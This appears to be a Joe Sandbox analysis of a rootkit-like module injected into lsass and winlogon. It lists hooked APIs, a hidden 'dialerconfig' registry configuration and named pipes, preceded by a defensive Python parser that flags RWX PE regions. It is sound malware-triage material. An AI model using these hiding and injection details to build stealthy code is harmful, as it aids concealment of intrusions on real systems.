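The function records above (one per recovered function: .sdmp dump name, .jbxd snapshot name, API ID, String ID, opcode and instruction hashes) are easier to triage once grouped by the memory region they were lifted from. The parser below is an added example, not part of the Joe Sandbox report or its tooling. It takes record text as printed on this page, copied into a constructed sample, and decodes the PID and base address that the .sdmp and .jbxd names both carry (the hex PID 0000001D in the dump name and the decimal 29 in hcaresult_29_2_... are the same winlogon process; 00000024 and 36 are lsass), cross-checks them, then lists regions that are PE images whose fifth dotted field reads 00000040, the value of PAGE_EXECUTE_READWRITE. Two things are assumptions of the example rather than facts stated by the report: that the fifth field is the region protection, and which host processes are worth flagging.

```python
import re

# Constructed sample: four function records copied from the report above
# (two from winlogon, PID 29 / 0x1D; two from lsass, PID 36 / 0x24).
SAMPLE = r"""APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
APIs
Memory Dump Source
• Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
APIs
Strings
Memory Dump Source
• Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
APIs
Memory Dump Source
• Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
"""

PAGE_EXECUTE_READWRITE = 0x40  # Windows constant; that the 5th .sdmp field is the protection is an assumption
SYSTEM_HOSTS = {"winlogon", "lsass", "explorer", "svchost"}  # assumed: hosts where injected PE code is suspicious

RECORD_START = "Memory Dump Source"
SRC_RE = re.compile(
    r"Source File: (?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<prot>[0-9A-F]{8})\.\S+?\.sdmp, Offset: (?P<offset>[0-9A-F]{16}), "
    r"based on PE: (?P<pe>true|false)")
SNAP_RE = re.compile(r"Snapshot File: hcaresult_(?P<pid>\d+)_\d+_(?P<base>[0-9a-f]+)_(?P<proc>[^.]+)\.jbxd")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")


def parse_records(text):
    """Split report text into one dict per function record, decoding PID, base and protection."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == RECORD_START:
            cur = {"api_id": "", "string_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = SRC_RE.search(line)
        if m:
            cur["pid"] = int(m["pid"], 16)
            cur["base"] = int(m["base"], 16)
            cur["prot"] = int(m["prot"], 16)
            cur["pe"] = m["pe"] == "true"
            if int(m["offset"], 16) != cur["base"]:
                raise ValueError("dump base and Offset disagree: " + line)
            continue
        m = SNAP_RE.search(line)
        if m:
            # The .jbxd name repeats the PID (decimal) and base; use it as a consistency check.
            if int(m["pid"]) != cur.get("pid") or int(m["base"], 16) != cur.get("base"):
                raise ValueError("snapshot name does not match dump name: " + line)
            cur["process"] = m["proc"]
            continue
        m = FIELD_RE.match(line)
        if m:
            cur[m["key"].strip().lower().replace(" ", "_")] = m["val"].strip()
    return records


def summarize_regions(records):
    """Group function records by (process, pid, base) and merge their API and string IDs."""
    regions = {}
    for r in records:
        key = (r["process"], r["pid"], r["base"])
        reg = regions.setdefault(key, {"functions": 0, "apis": set(), "strings": set(),
                                       "pe": r["pe"], "rwx": r["prot"] == PAGE_EXECUTE_READWRITE})
        reg["functions"] += 1
        reg["apis"].update(a for a in r["api_id"].split("$") if a)  # report joins API names with '$'
        if r["string_id"]:
            reg["strings"].add(r["string_id"])
    return regions


def injected_regions(regions):
    """Regions shaped like a reflectively injected module: a PE image in RWX memory of a system process."""
    return sorted(k for k, v in regions.items()
                  if k[0] in SYSTEM_HOSTS and v["pe"] and v["rwx"])


if __name__ == "__main__":
    regs = summarize_regions(parse_records(SAMPLE))
    for proc, pid, base in injected_regions(regs):
        v = regs[(proc, pid, base)]
        print(f"{proc}[{pid}] {base:#x}: {v['functions']} function(s), "
              f"APIs={sorted(v['apis'])}, strings={sorted(v['strings'])}")
```

Feeding the full report text instead of the sample gives one line per injected region with the union of APIs seen in it, which is the quickest way to tell the registry-walking loop in lsass (RegOpenKeyExW, RegEnumValueW, Sleep) apart from the path-filtering hook (GetFileType, GetFinalPathNameByHandleW, the `\\.\pipe\` and `\\?\` prefixes) without reading every record.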

                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:131
                                                                                Total number of Limit Nodes:10
                                                                                 [Execution graph rendering omitted; the raw node/edge dump is not readable as text. Recoverable from it:]
                                                                                 • Root functions: 140adfc273c (lsass, region 140adfc0000); 140ae86202c, 140ae861abc and 140ae86253c (lsass, region 140ae860000)
                                                                                 • API calls reached: LoadLibraryA; GetProcessHeap; StrCmpNIW, StrCmpIW, StrCmpW; RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey; Sleep, SleepEx; lstrlenW, StrCpyW, StrCatW, PathCombineW; GetFileType, GetFinalPathNameByHandleW
                                                                                 • CRT symbols recognised: __std_exception_copy, __free_lconv_mon

                                                                                Control-flow Graph

                                                                                 [Control-flow graph rendering for 140ae86253c-140ae8627fb omitted (legend: Executed / Not Executed). Calls visible in the graph: GetFileType, StrCpyW; subroutines 140ae882cc0, 140ae868c60 (x3), 140ae861a40, 140ae8630a8, 140ae863844, 140ae863044, 140ae861cac.]
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382

                                                                                Control-flow Graph

                                                                                 [Control-flow graph rendering for 140ae86202c-140ae862243 omitted (legend: Executed / Not Executed). Calls visible in the graph: StrCmpNIW; subroutines 140ae882d00, 140ae862f04, 140ae861bbc, 140ae861bf4.]
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: S$dialer
                                                                                • API String ID: 756756679-3873981283
                                                                                • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                                • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                                  • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                                • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                                • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                                  • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                                  • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292

                                                                                Control-flow Graph

                                                                                 [Control-flow graph rendering for 140adfc273c-140adfc29d0 omitted (legend: Executed / Not Executed). Calls visible in the graph: LoadLibraryA; subroutine 140adfc29d4 (x4).]
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                                • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                                  • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                                  • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                                  • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
